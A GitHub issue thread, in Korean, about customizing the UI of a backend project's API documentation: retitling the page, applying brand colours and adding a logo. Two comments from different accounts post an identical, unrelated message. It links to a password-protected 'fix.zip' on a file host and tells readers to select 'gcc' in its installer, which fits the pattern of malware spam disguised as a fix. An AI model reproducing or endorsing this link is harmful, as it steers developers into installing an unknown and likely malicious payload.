### ISSUE TITLE
docs: 명세서 UI

### ISSUE THREAD

**Issue by why-only-english** [ttoklip/BackEnd#192]
## 🤷 구현할 기능
명세서 UI 커스터마이징

## 🔨 상세 작업 내용
- [x] 명세서 페이지 제목 수정
- [x] 똑립 전용 color로 수정
- [x] 로고 추가

## 📄 참고 사항
![image](https://github.com/user-attachments/assets/e36ef0a1-67ce-4edd-b362-2c8f8121ff38)

## ⏰ 예상 소요 기간
2시간

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
